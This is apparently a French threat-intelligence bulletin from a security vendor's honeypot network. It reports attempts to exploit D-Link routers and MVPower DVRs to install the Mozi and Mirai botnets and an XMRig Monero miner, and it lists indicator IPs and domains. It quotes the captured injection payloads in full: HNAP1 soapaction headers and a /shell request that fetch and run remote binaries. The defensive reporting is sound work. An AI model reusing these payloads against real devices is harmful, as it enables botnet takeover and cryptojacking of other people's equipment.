Cette semaine, sur le réseau de TEHTRIS Deceptive Response, notre équipe de Threat Research a détecté des tentatives d’exploitation sur des appareils IoT vulnérables tels que des routeurs D-Link ou des enregistreurs vidéo-surveillance MVPower, dans le but de les enrôler dans des botnets ou de faire du minage de cryptomonnaie.
Sommaire
Tentative d’exploiter des routers D-Link vulnérables
TEHTRIS a observé des activités malveillantes visant à identifier et exploiter des routeurs D-Link vulnérables.
Téléchargement du botnet Mozi
Ces tentatives d’attaque sur des routeurs D-Link exposés pourraient s’inscrire dans une campagne mise en avant par les chercheurs de Palo Alto en août 2022[1], visant à propager MooBot, un variant du malware Mirai s’attaquant aux appareils vulnérables sous Linux. Les appareils compromis deviennent des bots dans une armée de botnet utilisée à des fins malveillantes pour lancer des attaques DDoS.
La requête URL est /HNAP1/. Le header http contient les éléments suivants :
['soapaction: http://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget http://101.0.32[.]235:58211/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`', 'content-type: text/xml; charset="utf-8"']
- Un champ “soapaction” avec une URL Purenetwork qui sert à exploiter la vulnérabilité
- Une séquence de commandes Unix (Linux) pour déclencher les actions suivantes :
- cd /tmp : permettant de se déplacer dans le répertoire /tmp (où se trouvent les fichiers temporaires)
- rm -rf * : visant à supprimer tous les fichiers localisés dans le fichier courant (/tmp) pour « nettoyer » l’environnement et s’assurer que les étapes suivantes se dérouleront sans encombre
- wget http://101.0.32[.]235:58211/Mozi.m : pour télécharger le fichier Mozi.m depuis l’adresse IP de l’attaquant sur le port 58211
- chmod 777 /tmp/Mozi.m : permettant de donner les droits d’exécution au fichier Mozi.m
- /tmp/Mozi.m : pour exécuter le fichier Mozi.m (un botnet)
Les commandes wget détectées par TEHTRIS font appel aux 34 adresses IP et ports ci-dessous (IoC):
IP | PORT | PAYS | AS |
102.33.43[.]180 | 41657 | ZA | AS327782 METROFIBRE-NETWORX |
103.177.184[.]238 | 35708 | IN | AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED |
103.183.33[.]151 | 44513 | IN | AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED |
111.61.154[.]108 | 52431 | CN | AS24547 HEBEI MOBILE COMMUNICATION COMPANY LIMITED |
112.248.121[.]159 | 41418 | CN | AS4837 CHINA UNICOM CHINA169 BACKBONE |
115.197.16[.]182 | 56929 | CN | AS4134 CHINANET |
115.208.130[.]40 | 56453 | CN | AS4134 CHINANET |
115.214.105[.]133 | 52092 | CN | AS4134 CHINANET |
115.52.21[.]98 | 36522 | CN | AS4837 CHINA UNICOM CHINA169 BACKBONE |
117.198.248[.]77 | 51366 | IN | AS9829 NATIONAL INTERNET BACKBONE |
117.217.146[.]136 | 57716 | IN | AS9829 NATIONAL INTERNET BACKBONE |
117.248.53[.]4 | 38607 | IN | AS9829 NATIONAL INTERNET BACKBONE |
117.63.41[.]64 | 51007 | CN | AS4134 CHINANET |
120.83.139[.]253 | 48258 | CN | AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE |
121.146.43[.]89 | 52936 | KR | AS4766 KOREA TELECOM |
123.10.134[.]251 | 34082 | CN | AS4837 CHINA UNICOM CHINA169 BACKBONE |
123.4.76[.]90 | 38002 | CN | AS4837 CHINA UNICOM CHINA169 BACKBONE |
124.91.229[.]171 | 42558 | CN | AS4837 CHINA UNICOM CHINA169 BACKBONE |
125.43.187[.]57 | 36302 | CN | AS4837 CHINA UNICOM CHINA169 BACKBONE |
163.125.14[.]69 | 44713 | CN | AS17623 CHINA UNICOM SHENZEN NETWORK |
182.119.203[.]8 | 33233 | CN | AS4837 CHINA UNICOM CHINA169 BACKBONE |
2.143.34[.]209 | 38389 | ES | AS3352 TELEFONICA DE ESPANA S.A.U. |
200.110.58[.]246 | 56319 | BO | AS27839 COMTECO LTDA |
202.164.131[.]68 | 47322 | IN | AS17465 CABLE ISP IN INDIA |
210.89.58[.]46 | 39424 | IN | AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED |
210.89.58[.]95 | 46472 | IN | AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED |
221.5.62[.]248 | 50039 | CN | AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE |
27.45.39[.]192 | 42667 | CN | AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE |
39.74.100[.]178 | 44354 | CN | AS4837 CHINA UNICOM CHINA169 BACKBONE |
42.228.194[.]25 | 45252 | CN | AS4837 CHINA UNICOM CHINA169 BACKBONE |
42.230.87[.]201 | 34163 | CN | AS4837 CHINA UNICOM CHINA169 BACKBONE |
58.46.196[.]9 | 36279 | CN | AS4134 CHINANET |
59.92.167[.]106 | 43448 | IN | AS9829 NATIONAL INTERNET BACKBONE |
Téléchargement d’un mineur de cryptomonnaie
TEHTRIS a également détecté des tentatives d’exploitation de routeurs D-Link pour télécharger un logiciel de cryptominage.
Le header http contient les éléments suivants :
['accept-encoding: gzip, deflate', 'soapaction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp; rm -rf xmr*; pkill xmrig*; wget https[:]//github[.]com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.test -p x -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.test -p x -k --nicehash --coin monero -a rx/0`"', 'accept: */*', 'connection: keep-alive']
L’attaquant tente de télécharger le logiciel de cryptominage XMRig depuis GitHub et de miner du Monero.
Les adresses IP ci-dessous ont effectué ces requêtes sur les leurres informatiques de TEHTRIS :
IP | Country | AS |
34.159.120[.]11 | DE | AS396982 GOOGLE-CLOUD-PLATFORM |
34.89.116[.]57 | GB | |
104.196.255[.]198 | US | |
34.85.144[.]234 | US |
Ces types de headers (« soapaction: « http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && ») sont utilisés par un module Metasploit et peuvent être personnalisés avec ce que l’on choisit d’y ajouter à la suite. De ce fait, c’est une méthode très connue et facile à employer, même pour des hackers peu qualifiés.
TEHTRIS recommande de mettre à jour vos routeurs D-Link pour patcher les vulnérabilités exploitées dans ce type d’attaques.
Des vulnérabilités de MVPower DVR ciblées par le malware Mirai
Par ailleurs, TEHTRIS a repéré des traces du malware Mirai qui prend le contrôle à distance d’appareils opérés sous Linux. En effet, des requêtes http/HTTPS étaient associées à l’User Agent « Hello, world », spécifique au malware Mirai. 465 adresses IP différentes ont lancé ces requêtes en semaine 38.
La requête suivante a été observée :
/shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws
IP / Domain Name | PORT | Country | ADDITIONAL INFORMATION |
103.159.64[.]218 | – | SG | AS395092 SHOCK-1 |
149.56.32[.]172 | – | CA | AS 16276 OVH SAS |
158.69.162[.]106 | – | CA | AS 16276 OVH SAS |
185.10.57[.]10 | – | NL | AS 51430 ALTUSHOST B.V. |
185.216.71[.]192 | – | NL | AS 211252 DELIS LLC Plus de 170 adresses IP ayant tenté d’exploiter cette vulnérabilité sur les honeypots de TEHTRIS renvoyaient vers ce serveur. |
41.216.189[.]209 | – | DE | AS 211138 PRIVATE-HOSTING DI CIPRIANO OSCAR 7 adresses IP chinoises ayant mené ces tentatives d’attaques sur les honeypots de TEHTRIS renvoyaient vers ce serveur. |
45.124.84[.]209 | – | VN | AS 135967 BACH KIM NETWORK SOLUTIONS JOIN STOCK COMPANY |
79.110.62[.]227 | – | US | AS 211252 DELIS LLC |
81.161.229[.]46 | – | US | AS 211252 DELIS LLC Plus de 70 adresses IP ayant mené ces tentatives d’attaques sur les honeypots de TEHTRIS renvoyaient vers ce serveur. |
91.122.37[.]169 | – | RU | AS 12389 ROSTELECOM |
123.97.144[.]204 | 60082 | CN | AS 4134 CHINANET |
171.125.249[.]180 | 50882 | CN | AS 4837 CHINA UNICOM CHINA169 BACKBONE |
183.150.97[.]46 | 48304 | CN | AS 4134 CHINANET |
222.141.40[.]148 | 42134 | CN | AS 4837 CHINA UNICOM CHINA169 BACKBONE |
27.45.14[.]109 | 37775 | CN | AS 17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE |
41.86.19[.]86 | 40901 | LR | AS 37203 LIBTELCO |
42.238.249[.]137 | 40463 | CN | AS 4837 CHINA UNICOM CHINA169 BACKBONE |
46.10.229[.]163 | 53653 | BG | AS 8866 VIVACOM |
botnet.psscc[.]cn | – | – | Créé le 2022-06-09 Ce nom de domaine est associé à l’adresse IP 81.161.229[.]46 (AS 211252 DELIS LLC US), considérée malveillante sur de nombreuses bases de données publiques et directement mentionnée dans plus de 70 requêtes détectées cette semaine. |
jx.qingdaosheng[.]com | – | – | Créé le 2022-03-20 Ce nom de domaine est associé à l’adresse IP 156.234.211[.]155 (AS131685 SUN NETWORK HONG KONG LIMITED HK), listée sur des blacklists publiques. |
networkmapping[.]xyz | – | – | Ce nom de domaine est associé à l’adresse IP 20.187.116[.]78 (AS8075 Microsoft Corporation HK) considéré malveillante par plusieurs bases de données publiques. |
whitesecurity[.]xyz | – | – | Créé le 2021-12-12 Ce nom de domaine est associé à l’adresse IP 185.38.142[.]79 (AS47674 NET SOLUTIONS – CONSULTORIA EM TECNOLOGIAS DE INFORMACAO, PT), connu de bases de données publiques pour conduire des activités malveillantes. |